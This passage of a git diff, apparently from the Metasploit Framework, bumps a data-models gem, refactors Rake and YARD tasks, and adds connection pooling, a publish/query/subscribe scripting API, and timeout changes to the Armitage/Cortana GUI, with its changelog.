diff --git a/.yardopts b/.yardopts new file mode 100644 index 0000000000..bb3a0e391f --- /dev/null +++ b/.yardopts @@ -0,0 +1,7 @@ +--protected +--exclude samples/ +--exclude \.ut\.rb/ +--exclude \.ts\.rb/ +--files CONTRIBUTING.md,COPYING,HACKING,LICENSE +lib/msf/**/*.rb +lib/rex/**/*.rb diff --git a/Gemfile b/Gemfile index 251808c2a5..bc0027d234 100755 --- a/Gemfile +++ b/Gemfile @@ -7,7 +7,7 @@ gem 'activerecord' # Needed for some admin modules (scrutinizer_add_user.rb) gem 'json' # Database models shared between framework and Pro. -gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.6.0' +gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.6.2' # Needed by msfgui and other rpc components gem 'msgpack' # Needed by anemone crawler diff --git a/Gemfile.lock b/Gemfile.lock index c16a1cca2f..af2598e887 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,9 +1,9 @@ GIT remote: git://github.com/rapid7/metasploit_data_models.git - revision: 0285d6e199f125b33214100dcb0f4eeb12ee765f - tag: 0.6.0 + revision: 67d78f9ce59a74ad9d6e8d3f9e68760ff4d2ec55 + tag: 0.6.2 specs: - metasploit_data_models (0.6.0) + metasploit_data_models (0.6.2) activerecord (>= 3.2.10) activesupport pg diff --git a/Rakefile b/Rakefile index d32e9352cb..c44736e0d3 100644 --- a/Rakefile +++ b/Rakefile @@ -1,52 +1,49 @@ require 'bundler/setup' -require 'rspec/core/rake_task' -require 'yard' +require 'metasploit_data_models' -RSpec::Core::RakeTask.new(:spec) +print_without = false -task :default => :spec +begin + require 'rspec/core/rake_task' +rescue LoadError + puts "rspec not in bundle, so can't set up spec tasks. " \ + "To run specs ensure to install the development and test groups." -namespace :yard do - yard_files = [ - # Ruby source files first - 'lib/msf/**/*.rb', - 'lib/rex/**/*.rb', - # Anything after '-' is a normal documentation, not source - '-', - 'COPYING', - 'HACKING', - 'LICENSE', - 'CONTRIBUTING.md', - ] - yard_options = [ - # include documentation for protected methods for developers extending the code. - '--protected', - # Don't bother with files meant to be examples - '--exclude', 'samples/', - '--exclude', '\.ut\.rb/', - '--exclude', '\.ts\.rb/', - ] + print_without = true +else + RSpec::Core::RakeTask.new(:spec) - YARD::Rake::YardocTask.new(:doc) do |t| - t.files = yard_files - # --no-stats here as 'stats' task called after will print fuller stats - t.options = yard_options + ['--no-stats'] - - t.after = Proc.new { - Rake::Task['yard:stats'].execute - } - end - - desc "Shows stats for YARD Documentation including listing undocumented modules, classes, constants, and methods" - task :stats => :environment do - stats = YARD::CLI::Stats.new - yard_arguments = yard_options + ['--compact', '--list-undoc'] + yard_files - stats.run(*yard_arguments) - end + task :default => :spec end -# @todo Figure out how to just clone description from yard:doc -desc "Generate YARD documentation" -# allow calling namespace to as a task that goes to default task for namespace -task :yard => ['yard:doc'] +begin + require 'yard' +rescue LoadError + puts "yard not in bundle, so can't set up yard tasks. " \ + "To generate documentation ensure to install the development group." + + print_without = true +end + +metasploit_data_models_task_glob = MetasploitDataModels.root.join( + 'lib', + 'tasks', + '**', + '*.rake' +).to_s + +# include tasks from metasplioit_data_models, such as `rake yard`. +# metasploit-framework specific yard options are in .yardopts +Dir.glob(metasploit_data_models_task_glob) do |path| + load path +end + +if print_without + puts "Bundle currently installed " \ + "'--without #{Bundler.settings.without.join(' ')}'." + puts "To clear the without option do `bundle install --without ''` " \ + "(the --without flag with an empty string) or " \ + "`rm -rf .bundle` to remove the .bundle/config manually and " \ + "then `bundle install`" +end diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar index 81c949a109..143b587e24 100755 Binary files a/data/armitage/armitage.jar and b/data/armitage/armitage.jar differ diff --git a/data/armitage/cortana.jar b/data/armitage/cortana.jar index 7c1da6dbfa..8035ff663c 100644 Binary files a/data/armitage/cortana.jar and b/data/armitage/cortana.jar differ diff --git a/data/armitage/whatsnew.txt b/data/armitage/whatsnew.txt index 55804871ff..01a4364bfc 100755 --- a/data/armitage/whatsnew.txt +++ b/data/armitage/whatsnew.txt @@ -1,6 +1,35 @@ Armitage Changelog ================== +6 Mar 13 (tested against msf ca43900a7) +-------- +- Active console now gets higher priority when polling msf for output +- Improved team server responsiveness in high latency situations by + creating additional connections to server to balance messages over +- Preferences are now shared among each Armitage connection. + +6 Mar 13 (2000h) +-------- +- Fixed issue with additional team server connections reporting wrong + application and receiving a summary rejection by the team server. + +Cortana Updates (for scripters) +-------- +- Added a &publish, &query, &subscribe API to allow inter-script + communication across the team server. +- Added &table_update to set the contents of a table tab without + disturbing the highlighted rows. +- Added an exec_error event. Fired when &m_exec or &m_exec_local fail + due to an error reported by meterpreter. +- Fixed a bug that sometimes caused session_sync to fire twice (boo!) +- Added a 60s timeout to &s_cmd commands. Cortana will give a shell + command 60s to execute. If it doesn't finish in that time, Cortana + will release the lock on the shell so the user can control it. + (ideally, this shouldn't happen... this is a safety mechanism) +- Changed Meterpreter command timeout to 2m from 12s. This is because + https meterpreter might not checkin for up to 60s, if it's been + idle for a long time. This will make &m_cmd less likely to timeout + 12 Feb 13 (tested against msf 16438) --------- - Fixed a corner case preventing the display of removed host labels diff --git a/documentation/Gemfile b/documentation/Gemfile deleted file mode 100755 index 7d6c690027..0000000000 --- a/documentation/Gemfile +++ /dev/null @@ -1,12 +0,0 @@ -source 'http://rubygems.org' -gem 'rails', '3.2.2' -gem 'authlogic' -gem 'prototype_legacy_helper', '0.0.0', :git => 'git://github.com/jvennix-r7/prototype_legacy_helper.git' -gem 'state_machine', '1.1.2' -gem 'liquid', '2.3.0' -gem 'ice_cube' -gem 'acts_as_list' -gem 'mime-types', '1.18', :git => "git://github.com/rapid7/mime-types.git" -gem 'metasploit_data_models', '0.0.2', :git => "git://github.com/rapid7/metasploit_data_models.git" -gem 'robots', '0.10.1' - diff --git a/external/source/armitage/resources/about.html b/external/source/armitage/resources/about.html index 1167b175f4..4c44f1ed61 100644 --- a/external/source/armitage/resources/about.html +++ b/external/source/armitage/resources/about.html @@ -3,7 +3,7 @@

Armitage 1.45

An attack management tool for Metasploit® -
Release: 12 Feb 13

+
Release: 6 Mar 13


Developed by:

diff --git a/external/source/armitage/scripts-cortana/internal-ui.sl b/external/source/armitage/scripts-cortana/internal-ui.sl index 498646fe41..ae479f22f1 100644 --- a/external/source/armitage/scripts-cortana/internal-ui.sl +++ b/external/source/armitage/scripts-cortana/internal-ui.sl @@ -188,13 +188,24 @@ sub table_selected_single { # table_set($table, @rows) sub table_set { - local('$model $row'); - $model = [$1 getModel]; - [$model clear: size($2) * 2]; - foreach $row ($2) { - [$model addEntry: $row]; - } - [$model fireListeners]; + later(lambda({ + local('$model $row'); + $model = [$a getModel]; + [$model clear: size($b) * 2]; + foreach $row ($b) { + [$model addEntry: $row]; + } + [$model fireListeners]; + }, $a => $1, $b => $2)); +} + +# table_set($table, @rows) +sub table_update { + later(lambda({ + [$a markSelections]; + table_set($a, $b); + [$a restoreSelections]; + }, $a => $1, $b => $2)); } # table_sorter($table, index, &function); diff --git a/external/source/armitage/scripts-cortana/internal.sl b/external/source/armitage/scripts-cortana/internal.sl index 5ab90d7235..a3081bf304 100644 --- a/external/source/armitage/scripts-cortana/internal.sl +++ b/external/source/armitage/scripts-cortana/internal.sl @@ -583,6 +583,39 @@ sub data_add { call("db.key_add", $1, $data); } +# +# a publish/query/subscribe API +# + +# publish("key", $object) +sub publish { + local('$data'); + $data = [msf.Base64 encode: cast(pack("o", $2, 1), 'b')]; + call_async("armitage.publish", $1, "$data $+ \n"); +} + +# query("key", "index") +sub query { + local('$r @r $result'); + $r = call("armitage.query", $1, $2)['data']; + if ($r ne "") { + foreach $result (split("\n", $r)) { + push(@r, unpack("o", [msf.Base64 decode: $result])[0]); + } + } + return @r; +} + +# subscribe("key", "index", "1s/5s/10s/15s/30s/1m/5m/10m/15m/20m/30m/60m") +sub subscribe { + on("heartbeat_ $+ $3", lambda({ + local('$result'); + foreach $result (query($key, $index)) { + fire_event_local($key, $result, $index); + } + }, $key => $1, $index => $2)); +} + # # Shell shock? # @@ -834,7 +867,7 @@ sub m_exec { }, \$command, \$channel, \$buffer)); } else { - # this is probably ok... + fire_event_local("exec_error", $1, $command, ["$3" trim]); } }, \$command)); } diff --git a/external/source/armitage/scripts/armitage.sl b/external/source/armitage/scripts/armitage.sl index 427e1c4a82..2df5fcf2a4 100644 --- a/external/source/armitage/scripts/armitage.sl +++ b/external/source/armitage/scripts/armitage.sl @@ -15,7 +15,7 @@ import graph.*; import java.awt.image.*; -global('$frame $tabs $menubar $msfrpc_handle $REMOTE $cortana $MY_ADDRESS $DESCRIBE @CLOSEME'); +global('$frame $tabs $menubar $msfrpc_handle $REMOTE $cortana $MY_ADDRESS $DESCRIBE @CLOSEME @POOL'); sub describeHost { local('$desc'); @@ -164,13 +164,14 @@ sub _connectToMetasploit { $client = [new MsgRpcImpl: $3, $4, $1, long($2), $null, $debug]; $aclient = [new RpcAsync: $client]; $mclient = $client; + push(@POOL, $aclient); initConsolePool(); $DESCRIBE = "localhost"; } # we have a team server... connect and authenticate to it. else { + [$progress setNote: "Connected: logging in"]; $client = c_client($1, $2); - setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L); $mclient = setup_collaboration($3, $4, $1, $2); $aclient = $mclient; @@ -178,6 +179,17 @@ sub _connectToMetasploit { [$progress close]; return; } + else { + [$progress setNote: "Connected: authenticated"]; + } + + # create six additional connections to team server... for balancing consoles. + local('$x $cc'); + for ($x = 0; $x < 6; $x++) { + $cc = c_client($1, $2); + call($cc, "armitage.validate", $3, $4, $null, "armitage", 120326); + push(@POOL, $cc); + } } $flag = $null; } diff --git a/external/source/armitage/scripts/preferences.sl b/external/source/armitage/scripts/preferences.sl index 19ad929524..ec418f2c19 100644 --- a/external/source/armitage/scripts/preferences.sl +++ b/external/source/armitage/scripts/preferences.sl @@ -57,12 +57,21 @@ sub parseYaml { sub loadPreferences { local('$file $prefs'); $file = getFileProper(systemProperties()["user.home"], ".armitage.prop"); - $prefs = [new Properties]; - if (-exists $file) { - [$prefs load: [new java.io.FileInputStream: $file]]; + if ($__frame__ !is $null && [$__frame__ getPreferences] !is $null) { + $prefs = [$__frame__ getPreferences]; } else { - [$prefs load: resource("resources/armitage.prop")]; + $prefs = [new Properties]; + if (-exists $file) { + [$prefs load: [new java.io.FileInputStream: $file]]; + } + else { + [$prefs load: resource("resources/armitage.prop")]; + } + + if ($__frame__ !is $null) { + [$__frame__ setPreferences: $prefs]; + } } # parse command line options here. diff --git a/external/source/armitage/scripts/shell.sl b/external/source/armitage/scripts/shell.sl index 7af64f264e..43abea73c3 100644 --- a/external/source/armitage/scripts/shell.sl +++ b/external/source/armitage/scripts/shell.sl @@ -290,7 +290,7 @@ sub createShellSessionTab { return; } - $thread = [new ConsoleClient: $console, $client, "session.shell_read", "session.shell_write", $null, $sid, 0]; + $thread = [new ConsoleClient: $console, rand(@POOL), "session.shell_read", "session.shell_write", $null, $sid, 0]; [$frame addTab: "Shell $sid", $console, lambda({ call_async($mclient, "armitage.unlock", $sid); [$thread kill]; diff --git a/external/source/armitage/scripts/util.sl b/external/source/armitage/scripts/util.sl index b226c1edc2..8bc953b989 100644 --- a/external/source/armitage/scripts/util.sl +++ b/external/source/armitage/scripts/util.sl @@ -78,7 +78,7 @@ sub setupEventStyle { sub createDisplayTab { local('$console $host $queue $file'); - $queue = [new ConsoleQueue: $client]; + $queue = [new ConsoleQueue: rand(@POOL)]; if ($1 eq "Log Keystrokes") { $console = [new ActivityConsole: $preferences]; } @@ -100,7 +100,7 @@ sub createConsolePanel { setupConsoleStyle($console); $result = call($client, "console.create"); - $thread = [new ConsoleClient: $console, $aclient, "console.read", "console.write", "console.destroy", $result['id'], $1]; + $thread = [new ConsoleClient: $console, rand(@POOL), "console.read", "console.write", "console.destroy", $result['id'], $1]; [$thread setMetasploitConsole]; [$thread setSessionListener: { diff --git a/external/source/armitage/src/armitage/ConsoleClient.java b/external/source/armitage/src/armitage/ConsoleClient.java index 7937362f1a..82a8b05fd2 100644 --- a/external/source/armitage/src/armitage/ConsoleClient.java +++ b/external/source/armitage/src/armitage/ConsoleClient.java @@ -215,6 +215,7 @@ public class ConsoleClient implements Runnable, ActionListener { Map read; boolean shouldRead = go_read; String command = null; + long last = 0; try { while (shouldRead) { @@ -230,21 +231,23 @@ public class ConsoleClient implements Runnable, ActionListener { lastRead = System.currentTimeMillis(); } - read = readResponse(); - - if (read == null || "failure".equals( read.get("result") + "" )) { - break; - } - - processRead(read); - - if ((System.currentTimeMillis() - lastRead) <= 500) { - Thread.sleep(10); + long now = System.currentTimeMillis(); + if (this.window != null && !this.window.isShowing() && (now - last) < 1500) { + /* check if our window is not showing... if not, then we're going to switch to a very reduced + read schedule. */ } else { - Thread.sleep(500); + read = readResponse(); + if (read == null || "failure".equals( read.get("result") + "" )) { + break; + } + + processRead(read); + last = System.currentTimeMillis(); } + Thread.sleep(100); + synchronized (listeners) { shouldRead = go_read; } diff --git a/external/source/armitage/src/cortana/data/Sessions.java b/external/source/armitage/src/cortana/data/Sessions.java index cedac86993..6b4da2455d 100644 --- a/external/source/armitage/src/cortana/data/Sessions.java +++ b/external/source/armitage/src/cortana/data/Sessions.java @@ -130,6 +130,10 @@ public class Sessions extends ManagedData { } } + /* calculate the differences and fire some events based on them */ + Set newSessions = DataUtils.difference(after, before); + fireSessionEvents("session_open", newSessions.iterator(), dataz); + /* calculate sync events and fix the nonsync set */ Set newsync = DataUtils.intersection(syncz, nonsync); fireSessionEvents("session_sync", newsync.iterator(), dataz); @@ -137,11 +141,9 @@ public class Sessions extends ManagedData { /* update our list of non-synced sessions */ nonsync.removeAll(syncz); - /* calculate the differences and fire some events based on them */ - Set newSessions = DataUtils.difference(after, before); - fireSessionEvents("session_open", newSessions.iterator(), dataz); - - newSessions.retainAll(syncz); + /* these are sessions that are new and sync'd -- fire events for them... */ + newSessions.removeAll(newsync); /* we already fired events for these */ + newSessions.retainAll(syncz); /* keep anything that is synced */ fireSessionEvents("session_sync", newSessions.iterator(), dataz); Set droppedSessions = DataUtils.difference(before, after); diff --git a/external/source/armitage/src/cortana/gui/UIBridge.java b/external/source/armitage/src/cortana/gui/UIBridge.java index d4def58a71..42fe117687 100644 --- a/external/source/armitage/src/cortana/gui/UIBridge.java +++ b/external/source/armitage/src/cortana/gui/UIBridge.java @@ -30,11 +30,16 @@ public class UIBridge implements Loadable, Function { if (name.equals("&later")) { final SleepClosure f = BridgeUtilities.getFunction(args, script); final Stack argz = EventManager.shallowCopy(args); - SwingUtilities.invokeLater(new Runnable() { - public void run() { - SleepUtils.runCode(f, "laterz", null, argz); - } - }); + if (SwingUtilities.isEventDispatchThread()) { + SleepUtils.runCode(f, "laterz", null, argz); + } + else { + SwingUtilities.invokeLater(new Runnable() { + public void run() { + SleepUtils.runCode(f, "laterz", null, argz); + } + }); + } } return SleepUtils.getEmptyScalar(); diff --git a/external/source/armitage/src/cortana/metasploit/ShellSession.java b/external/source/armitage/src/cortana/metasploit/ShellSession.java index f79f752511..4f3207680d 100644 --- a/external/source/armitage/src/cortana/metasploit/ShellSession.java +++ b/external/source/armitage/src/cortana/metasploit/ShellSession.java @@ -75,7 +75,8 @@ public class ShellSession implements Runnable { /* loop forever waiting for response to come back. If session is dead then this loop will break with an exception */ - while (true) { + long start = System.currentTimeMillis(); + while ((System.currentTimeMillis() - start) < 60000) { response = readResponse(); String data = (response.get("data") + ""); @@ -95,6 +96,7 @@ public class ShellSession implements Runnable { Thread.sleep(100); } + System.err.println(session + " -> " + c.text + " (took longer than anticipated, dropping: " + (System.currentTimeMillis() - start) + ")"); } catch (Exception ex) { System.err.println(session + " -> " + c.text + " ( " + response + ")"); diff --git a/external/source/armitage/src/msf/MeterpreterSession.java b/external/source/armitage/src/msf/MeterpreterSession.java index 2f42fc09d9..fb91d6ab9e 100644 --- a/external/source/armitage/src/msf/MeterpreterSession.java +++ b/external/source/armitage/src/msf/MeterpreterSession.java @@ -14,7 +14,7 @@ public class MeterpreterSession implements Runnable { protected String session; protected boolean teammode; - public static long DEFAULT_WAIT = 12000; + public static long DEFAULT_WAIT = 120000; private static class Command { public Object token; diff --git a/external/source/armitage/src/msf/RpcConnectionImpl.java b/external/source/armitage/src/msf/RpcConnectionImpl.java index d784ab17b7..426cb079ae 100644 --- a/external/source/armitage/src/msf/RpcConnectionImpl.java +++ b/external/source/armitage/src/msf/RpcConnectionImpl.java @@ -10,6 +10,7 @@ import javax.xml.transform.*; import javax.xml.transform.dom.*; import javax.xml.transform.stream.*; import org.w3c.dom.*; +import armitage.ArmitageBuffer; /** * This is a modification of msfgui/RpcConnection.java by scriptjunkie. Taken from @@ -85,6 +86,22 @@ public abstract class RpcConnectionImpl implements RpcConnection, Async { protected HashMap locks = new HashMap(); protected String address = ""; + protected HashMap buffers = new HashMap(); + + /* help implement our remote buffer API for PQS primitives */ + public ArmitageBuffer getABuffer(String key) { + synchronized (buffers) { + ArmitageBuffer buffer; + if (buffers.containsKey(key)) { + buffer = (ArmitageBuffer)buffers.get(key); + } + else { + buffer = new ArmitageBuffer(16384); + buffers.put(key, buffer); + } + return buffer; + } + } public String getLocalAddress() { return address; @@ -133,6 +150,23 @@ public abstract class RpcConnectionImpl implements RpcConnection, Async { locks.remove(params[0] + ""); return new HashMap(); } + else if (methodName.equals("armitage.publish")) { + ArmitageBuffer buffer = getABuffer(params[0] + ""); + buffer.put(params[1] + ""); + return new HashMap(); + } + else if (methodName.equals("armitage.query")) { + ArmitageBuffer buffer = getABuffer(params[0] + ""); + String data = (String)buffer.get(params[1] + ""); + HashMap temp = new HashMap(); + temp.put("data", data); + return temp; + } + else if (methodName.equals("armitage.reset")) { + ArmitageBuffer buffer = getABuffer(params[0] + ""); + buffer.reset(); + return new HashMap(); + } else if (hooks.containsKey(methodName)) { RpcConnection con = (RpcConnection)hooks.get(methodName); return con.execute(methodName, params); diff --git a/external/source/armitage/src/ui/ATable.java b/external/source/armitage/src/ui/ATable.java index ce80216dbd..6b9eb9b140 100644 --- a/external/source/armitage/src/ui/ATable.java +++ b/external/source/armitage/src/ui/ATable.java @@ -10,8 +10,48 @@ import table.*; import java.util.*; public class ATable extends JTable { + public static final String indicator = " \u271A"; + protected boolean alternateBackground = false; + protected int[] selected = null; + + /* call this function to store selections */ + public void markSelections() { + selected = getSelectedRows(); + } + + public void fixSelection() { + if (selected.length == 0) + return; + + getSelectionModel().setValueIsAdjusting(true); + + int rowcount = getModel().getRowCount(); + + for (int x = 0; x < selected.length; x++) { + if (selected[x] < rowcount) { + getSelectionModel().addSelectionInterval(selected[x], selected[x]); + } + } + + getSelectionModel().setValueIsAdjusting(false); + } + + /* call this function to restore selections after a table update */ + public void restoreSelections() { + if (!SwingUtilities.isEventDispatchThread()) { + SwingUtilities.invokeLater(new Runnable() { + public void run() { + fixSelection(); + } + }); + } + else { + fixSelection(); + } + } + public static TableCellRenderer getDefaultTableRenderer(final JTable table, final TableModel model) { final Set specialitems = new HashSet(); specialitems.add("Wordlist"); @@ -39,7 +79,7 @@ public class ATable extends JTable { String content = (value != null ? value : "") + ""; if (specialitems.contains(content) || content.indexOf("FILE")!= -1) { - content = content + " \u271A"; + content = content + indicator; } JComponent c = (JComponent)render.getTableCellRendererComponent(table, content, isSelected, false, row, column); @@ -117,6 +157,47 @@ public class ATable extends JTable { }; } + public static TableCellRenderer getTimeTableRenderer() { + return new TableCellRenderer() { + public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) { + TableCellRenderer render = table.getDefaultRenderer(String.class); + + JComponent c = (JComponent)render.getTableCellRendererComponent(table, "", isSelected, false, row, column); + + try { + long size = Long.parseLong(value + ""); + String units = "ms"; + + if (size > 1000) { + size = size / 1000; + units = "s"; + } + else { + ((JLabel)c).setText(size + units); + return c; + } + + if (size > 60) { + size = size / 60; + units = "m"; + } + + if (size > 60) { + size = size / 60; + units = "h"; + } + + ((JLabel)c).setText(size + units); + } + catch (Exception ex) { + + } + + return c; + } + }; + } + public void adjust() { setShowGrid(false); setIntercellSpacing(new Dimension(0, 0)); diff --git a/external/source/armitage/src/ui/MultiFrame.java b/external/source/armitage/src/ui/MultiFrame.java index 96bea014f1..ba994e940e 100644 --- a/external/source/armitage/src/ui/MultiFrame.java +++ b/external/source/armitage/src/ui/MultiFrame.java @@ -17,6 +17,7 @@ public class MultiFrame extends JFrame implements KeyEventDispatcher { protected JPanel content; protected CardLayout cards; protected LinkedList buttons; + protected Properties prefs; private static class ArmitageInstance { public ArmitageApplication app; @@ -24,6 +25,14 @@ public class MultiFrame extends JFrame implements KeyEventDispatcher { public RpcConnection client; } + public void setPreferences(Properties prefs) { + this.prefs = prefs; + } + + public Properties getPreferences() { + return prefs; + } + public Map getClients() { synchronized (buttons) { Map r = new HashMap(); diff --git a/external/source/armitage/whatsnew.txt b/external/source/armitage/whatsnew.txt index 55804871ff..01a4364bfc 100644 --- a/external/source/armitage/whatsnew.txt +++ b/external/source/armitage/whatsnew.txt @@ -1,6 +1,35 @@ Armitage Changelog ================== +6 Mar 13 (tested against msf ca43900a7) +-------- +- Active console now gets higher priority when polling msf for output +- Improved team server responsiveness in high latency situations by + creating additional connections to server to balance messages over +- Preferences are now shared among each Armitage connection. + +6 Mar 13 (2000h) +-------- +- Fixed issue with additional team server connections reporting wrong + application and receiving a summary rejection by the team server. + +Cortana Updates (for scripters) +-------- +- Added a &publish, &query, &subscribe API to allow inter-script + communication across the team server. +- Added &table_update to set the contents of a table tab without + disturbing the highlighted rows. +- Added an exec_error event. Fired when &m_exec or &m_exec_local fail + due to an error reported by meterpreter. +- Fixed a bug that sometimes caused session_sync to fire twice (boo!) +- Added a 60s timeout to &s_cmd commands. Cortana will give a shell + command 60s to execute. If it doesn't finish in that time, Cortana + will release the lock on the shell so the user can control it. + (ideally, this shouldn't happen... this is a safety mechanism) +- Changed Meterpreter command timeout to 2m from 12s. This is because + https meterpreter might not checkin for up to 60s, if it's been + idle for a long time. This will make &m_cmd less likely to timeout + 12 Feb 13 (tested against msf 16438) --------- - Fixed a corner case preventing the display of removed host labels diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Rakefile deleted file mode 100755 index 8fd6dc482f..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Rakefile +++ /dev/null @@ -1,34 +0,0 @@ -#!/usr/bin/env rake -begin - require 'bundler/setup' -rescue LoadError - puts 'You must `gem install bundler` and `bundle install` to run rake tasks' -end - -APP_RAKEFILE = File.expand_path('../spec/dummy/Rakefile', __FILE__) -load 'rails/tasks/engine.rake' - -Bundler::GemHelper.install_tasks - -# -# load rake files like a normal rails app -# @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl -# - -pathname = Pathname.new(__FILE__) -root = pathname.parent -rakefile_glob = root.join('lib', 'tasks', '**', '*.rake').to_path - -Dir.glob(rakefile_glob) do |rakefile| - load rakefile -end - -require 'rspec/core' -require 'rspec/core/rake_task' - -# Depend on app:db:test:prepare so that test database is recreated just like in a full rails app -# @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl -RSpec::Core::RakeTask.new(:spec => 'app:db:test:prepare') - -task :default => :spec - diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/engine.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/engine.rb deleted file mode 100644 index 4f73f5c985..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/engine.rb +++ /dev/null @@ -1,14 +0,0 @@ -require 'rails' - -module MetasploitDataModels - class Engine < Rails::Engine - - # @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl - config.generators do |g| - g.assets false - g.fixture_replacement :factory_girl, :dir => 'spec/factories' - g.helper false - g.test_framework :rspec, :fixture => false - end - end -end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/tasks/yard.rake b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/tasks/yard.rake deleted file mode 100644 index cc279684e7..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/tasks/yard.rake +++ /dev/null @@ -1,27 +0,0 @@ -# @note All options not specific to any given rake task should go in the .yardopts file so they are available to both -# the below rake tasks and when invoking `yard` from the command line - -require 'yard' -require 'yard/rake/yardoc_task' - -namespace :yard do - YARD::Rake::YardocTask.new(:doc) do |t| - # --no-stats here as 'stats' task called after will print fuller stats - t.options = ['--no-stats'] - - t.after = Proc.new { - Rake::Task['yard:stats'].execute - } - end - - desc "Shows stats for YARD Documentation including listing undocumented modules, classes, constants, and methods" - task :stats => :environment do - stats = YARD::CLI::Stats.new - stats.run('--compact', '--list-undoc') - end -end - -# @todo Figure out how to just clone description from yard:doc -desc "Generate YARD documentation" -# allow calling namespace to as a task that goes to default task for namespace -task :yard => ['yard:doc'] \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.gitignore b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/.gitignore similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.gitignore rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/.gitignore diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.rspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/.rspec similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.rspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/.rspec diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.simplecov b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/.simplecov similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.simplecov rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/.simplecov diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.yardopts b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/.yardopts similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.yardopts rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/.yardopts diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Gemfile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/Gemfile similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Gemfile rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/Gemfile diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/LICENSE b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/LICENSE similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/LICENSE rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/LICENSE diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/README.md b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/README.md similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/README.md rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/README.md diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/Rakefile new file mode 100755 index 0000000000..6236c59a57 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/Rakefile @@ -0,0 +1,53 @@ +#!/usr/bin/env rake +begin + require 'bundler/setup' +rescue LoadError + puts 'You must `gem install bundler` and `bundle install` to run rake tasks' +end + +print_without = false +APP_RAKEFILE = File.expand_path('../spec/dummy/Rakefile', __FILE__) + +begin + load 'rails/tasks/engine.rake' +rescue LoadError + puts "railties not in bundle, so can't load engine tasks." + print_without = true +end + +Bundler::GemHelper.install_tasks + +# +# load rake files like a normal rails app +# @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl +# + +pathname = Pathname.new(__FILE__) +root = pathname.parent +rakefile_glob = root.join('lib', 'tasks', '**', '*.rake').to_path + +Dir.glob(rakefile_glob) do |rakefile| + load rakefile +end + +begin + require 'rspec/core' +rescue LoadError + puts "rspec not in bundle, so can't set up spec tasks. " \ + "To run specs ensure to install the development and test groups." + print_without = true +else + require 'rspec/core/rake_task' + + # Depend on app:db:test:prepare so that test database is recreated just like in a full rails app + # @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl + RSpec::Core::RakeTask.new(:spec => 'app:db:test:prepare') + + task :default => :spec +end + +if print_without + puts "Bundle currently installed '--without #{Bundler.settings.without.join(' ')}'." + puts "To clear the without option do `bundle install --without ''` (the --without flag with an empty string) or " \ + "`rm -rf .bundle` to remove the .bundle/config manually and then `bundle install`" +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/api_key.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/api_key.rb similarity index 100% rename from 